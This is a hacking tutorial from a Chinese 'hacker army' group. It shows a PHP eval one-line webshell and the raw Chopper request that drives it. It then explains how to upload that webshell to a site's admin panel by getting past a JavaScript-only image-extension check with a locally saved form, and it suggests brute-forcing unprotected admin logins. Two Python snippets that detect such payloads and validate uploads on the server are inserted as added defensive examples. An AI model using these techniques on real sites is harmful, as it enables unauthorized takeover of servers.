This article is purely introductory. Before reading it, please make sure you understand the difference between GET and POST:
Website form submission methods: GET and POST explained
If you do not understand that article, or do not want to read it, here is a simpler introduction to GET and POST.
GET parameters are visible in the URL. Most of the injection or file-inclusion bugs we run into are in GET, while remote command execution, getshell and arbitrary-file-execution vulnerabilities are mostly exercised through POST.
This is not a general rule: many injections are POST as well. A typical example is the universal-password login bypass, which is POST injection.
So what is the difference between GET and POST?
GET is reflected directly in the URL. For example, when x.php receives the cmd variable via GET, the format is /x.php?cmd=xxxxx
POST is sent from a form and is invisible in the URL: when x.php receives the cmd variable via POST, the URL is still x.php with nothing after it, but IE, Safari, Chrome and other browsers have actually completed the data exchange through the <form> </form> tag on the page.
I think you should have understood it. If not, go and read up on HTML first; this is the most basic HTTP data exchange in HTML. Okay, let's get started.
First, let's look at a PHP one-sentence webshell:
<?php
eval($_POST['xxx']);
?>
We usually drive it with a one-sentence-shell client such as Chopper (the "kitchen knife"). But do you know how the kitchen knife works? Why is xxx the password?
It's actually very simple.
The PHP takes the POSTed value and executes it as PHP code. If you run the PHP code phpinfo() through the one-sentence shell, the client sends the following data:
POST /cmd.php HTTP/1.1
Host: blackbap.org
User-Agent: Chopper
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: zh-cn;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: gb2312;q=0.7
Keep-Alive: 300
Referer: http://www.bkjia.com/cmd.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

xxx=phpinfo()
Look directly at the last line. Yes, that is the data sent by POST.
If we capture packets, we will see a packet very similar to this.
So how does this data transmission work in a browser? That is even easier:
<form action="http://blackbap.org/cmd.php" method="POST">
<input type="text" name="xxx" value="phpinfo()">
<input type="submit" value="submit">
</form>
Save the above code as xx.html, open it in a browser and submit it; the POST data captured in the packet above is sent.
We can see a relationship like this:
If the one-sentence trojan contains:
$bl1 = $_POST['bianliang1'];
$bl2 = $_POST['bianliang2'];
$bl3 = $_POST['bianliang3'];
.............
$blN = $_POST['bianliangN'];
Then in the form you can write:
<input type="text" name="bianliang1" value="">
<input type="text" name="bianliang2" value="">
<input type="text" name="bianliang3" value="">
.....
<input type="text" name="bianliangN" value="">
The end of the POST packet is:
bianliang1=xxxx&bianliang2=xxxx&bianliang3=xxxx&...&bianliangN=xxxx
Well, that was simple.
So what do I actually want to talk about?
Let's look at this admin back-end page:
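As an added example that is not part of the original article: a small Python parser that reads a raw request like the Chopper packet above into its headers and form fields, the way the receiving PHP script would see them in $_POST, and flags field values that look like PHP code. The sample request is constructed from the article, and the function-name pattern is a hypothetical detection rule, not anything the article or Chopper defines.

```python
import re
from urllib.parse import parse_qs

# Constructed sample modelled on the article's Chopper request (not a real capture).
BODY = "xxx=phpinfo()"
SAMPLE_REQUEST = (
    "POST /cmd.php HTTP/1.1\r\n"
    "Host: blackbap.org\r\n"
    "User-Agent: Chopper\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    f"Content-Length: {len(BODY)}\r\n"
    "\r\n"
    + BODY
)

# Hypothetical detection rule: a form value that calls a PHP execution or
# evaluation function. Tune the list for the application being protected.
CODE_CALL = re.compile(
    r"\b(eval|assert|system|exec|shell_exec|passthru|phpinfo)\s*\(", re.IGNORECASE)


def parse_request(raw: str):
    """Split a raw HTTP request into (method, path, headers, post_fields).

    post_fields holds what PHP would place in $_POST for a urlencoded body.
    """
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    fields = {}
    ctype = headers.get("content-type", "")
    if method == "POST" and ctype.startswith("application/x-www-form-urlencoded"):
        length = int(headers.get("content-length", len(body)))
        # keep_blank_values so an empty "xxx=" still shows up as a field
        for key, values in parse_qs(body[:length], keep_blank_values=True).items():
            fields[key] = values[-1]   # PHP keeps the last duplicate key
    return method, path, headers, fields


def suspicious_fields(fields: dict) -> list:
    """Names of POST fields whose value looks like PHP code."""
    return [name for name, value in fields.items() if CODE_CALL.search(value)]
```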
<script language="javascript" type="text/javascript">
function val()
{
    if (document.addpro.album_title.value == "")
    {
        alert("Enter project title");
        document.addpro.album_title.focus();
        return false;
    }
    if (document.addpro.album_pos.value == "")
    {
        alert("Select the position");
        document.addpro.album_pos.focus();
        return false;
    }
    if (document.addpro.album_image.value != "")
    {
        var img = document.addpro.album_image.value;
        var pos = img.lastIndexOf('.');
        if (pos < 0)
        {
            alert("Unsupported image format");
            document.addpro.album_image.focus();
            return false;
        }
        if (pos >= 0)
        {
            var mainext = img.substr(pos + 1);
            if ((mainext != 'jpg') && (mainext != 'JPG') && (mainext != 'jpeg') && (mainext != 'JPEG') && (mainext != 'gif') && (mainext != 'GIF') && (mainext != 'bmb') && (mainext != 'BMB') && (mainext != 'png') && (mainext != 'PNG'))
            {
                alert("Unsupported image format");
                document.addpro.album_image.focus();
                return false;
            }
        }
    }
    return true;
}
</script>
</head>
<form method="post" enctype="multipart/form-data" name="addpro" onsubmit="return val();">
<select name="album_pos">
<option value="">Select the position</option>
<option value="1">1</option>
<option value="Last">Last</option>
</select>
<input type="file" name="album_image"/>
<input type="submit" name="Submit" value="ADD"/>
</form>
This is the source of the "add album" page in a site's admin back end (viewed via right-click "view source", with parts modified and deleted). If you pick a PHP file directly as the album cover in the back end, the upload will not go through,
because of this piece of code:
if ((mainext != 'jpg') && (mainext != 'JPG') && (mainext != 'jpeg') && (mainext != 'JPEG') && (mainext != 'gif') && (mainext != 'GIF') && (mainext != 'bmb') && (mainext != 'BMB') && (mainext != 'png') && (mainext != 'PNG'))
If the suffix is not jpg, JPG, jpeg, JPEG, gif, GIF, bmb, BMB, png or PNG, the check fails.
So how does this JavaScript affect the POST data?
The <form> tag contains this attribute: onsubmit="return val();"
Yes, this is what makes the form run the JavaScript before submitting.
The problem is that the JavaScript runs in the local browser, that is, on the machine of whoever visits the page. If I refuse to run it, his suffix check no longer restricts me.
That is trivial. Disabling JavaScript in the browser works, but it is not a very good method. The most conservative approach is:
<form method="post" action="url address for uploading album images" enctype="multipart/form-data">
<select name="position">
<option value="">Select the position</option>
<option value="1">1</option>
<option value="Last">Last</option>
</select>
<input type="file" name="album_image"/>
<input type="submit" name="Submit" value="ADD"/>
</form>
Replace onsubmit with action, enter the URL that the album image is uploaded to, save it as xxx.html and open it in a browser. Now you can POST the PHP file directly.
If you capture the packet, you can check whether it contains:
position=Last&album_image=<?php eval($_POST[c]);?>
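As an added example (my code, not the article's or the site's): the same suffix check done on the server in Python, where the visitor cannot skip it, plus a check of the file's leading bytes so that a PHP file renamed to .jpg is refused as well. It assumes the server already has the upload's filename and bytes (taken from the multipart body the form sends); the allowlist follows the article's list, with its "bmb" entry (presumably bmp) left out.

```python
import os
from typing import Tuple

# Extension allowlist taken from the article's JavaScript, compared lower-cased so
# JPG and jpg are the same entry. The page's "bmb" entry (presumably bmp) is omitted.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "gif", "png"}

# Leading bytes of each accepted format, so the content is checked as well as the name.
MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
    "png": (b"\x89PNG\r\n\x1a\n",),
}


def validate_upload(filename: str, content: bytes) -> Tuple[bool, str]:
    """Decide on the server whether an uploaded album image may be stored.

    Returns (accepted, reason). This runs whether or not the browser ran val().
    """
    base = os.path.basename(filename.replace("\\", "/"))  # drop any client-supplied path
    name, dot, ext = base.rpartition(".")
    if not dot or not name:  # no suffix at all (the JS "pos < 0" case) or a bare ".php"
        return False, "missing file extension"
    ext = ext.lower()
    if ext not in ALLOWED_EXTENSIONS:
        return False, f"extension '{ext}' is not allowed"
    if not content.startswith(MAGIC[ext]):  # startswith accepts a tuple of prefixes
        return False, f"content does not look like a {ext} image"
    return True, "ok"
```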
Once you understand the principle, it can be extended. For example, if the back-end login has no verification code, we only need to right-click the login page, view its source, modify the action address, save it as html, and then use a tool to brute-force the back-end password by substituting the value.
There is also POST injection in back-end login boxes, and so on: http://www.bkjia.com/Article/201112/115384.html
Experts who read this article may be disappointed, but as I said at the start, this is just a very simple thing.
Author: YoCo Smart from: Silic Group Hacker Army